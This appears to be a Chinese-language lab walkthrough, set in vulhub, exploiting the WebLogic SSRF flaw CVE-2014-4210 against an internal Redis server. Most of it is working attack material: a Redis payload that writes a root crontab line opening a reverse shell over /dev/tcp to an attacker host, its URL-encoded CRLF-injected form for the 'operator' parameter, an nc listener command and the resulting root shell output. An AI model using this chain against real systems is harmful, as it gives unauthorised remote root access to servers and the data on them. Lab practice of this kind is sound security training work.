WebLogic-Redis:CVE-2014-4210[SSRF]

环境部署

vulhub：/vulhub-master/weblogic/ssrf

1.开启靶场

[root@localhost ssrf]# docker-compose up -d
Starting ssrf_redis_1 ... done
Starting ssrf_weblogic_1 ... done

2. 查看端口

[root@localhost ssrf]# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED        STATUS              PORTS                                                 NAMES
6ef6868dbbb9   vulhub/weblogic:10.3.6.0-2017   "startWebLogic.sh"       26 hours ago   Up About a minute   5556/tcp, 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp   ssrf_weblogic_1
86f083e195f6   vulhub/baselinux:centos-6       "/docker-entrypoint...."   26 hours ago   Up About a minute   6379/tcp                                              ssrf_redis_1

3.获取redis内网ip【172.22.0.2】

docker exec -it 容器ID ifconfig

[root@localhost ssrf]# docker exec -it 86f083e195f6 ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:16:00:02
          inet addr:172.22.0.2  Bcast:172.22.255.255  Mask:255.255.0.0

4.访问漏洞发生页面

http://192.168.10.5:7001/uddiexplorer/SearchPublicRegistries.jsp

漏洞利用

1.打开bp代理

2.页面输入任意内容提交，bp抓包

漏洞点参数为 operator

3.替换参数，测试端口开启情况

operator=http://172.22.0.2:6379/

查看响应包中内容

An error has occurred<BR>
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://172.22.0.2:6379/ which did not have a valid SOAP content-type: null.

发生<BR>错误
weblogic.uddi.client.structures.exception.XML_SoapException：收到来自 url： http://172.22.0.2:6379/ 的响应，该响应没有有效的 SOAP content-type： null。

4.编写payload

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >&
/dev/tcp/192.168.10.128/7777 0>&1' \n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

5.进行url编码

encodeURIComponent编码方式

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave

6.将编码后的所有换行符替换

由于redis命令由 \r\n 结尾，需要将 %0A 替换为 %0D%0A

将命令保存为txt文档，选中指定内容 ctrl+h 进行替换

替换后：

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%0D%0A%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%261'%20%5Cn%5Cn%5Cn%5Cn%22%20config%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

7.在二次加工后的payload添加指定内容

最终payload：

对红色部分进行替换

operator=http://172.22.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%

5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200- 6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.10.128%2F7777%200%3E%

261'%20%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0

D%0Alalala

8.监听7777端口

nc lvp 7777

9.发送数据包，进行反弹连接

连接成功：
┌──(root㉿kali)-[~]
└─# nc -lvp 7777  
listening on [any] 7777 ...

192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 35496
sh: no job control in this shell
sh-4.1# 
sh-4.1# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
sh-4.1#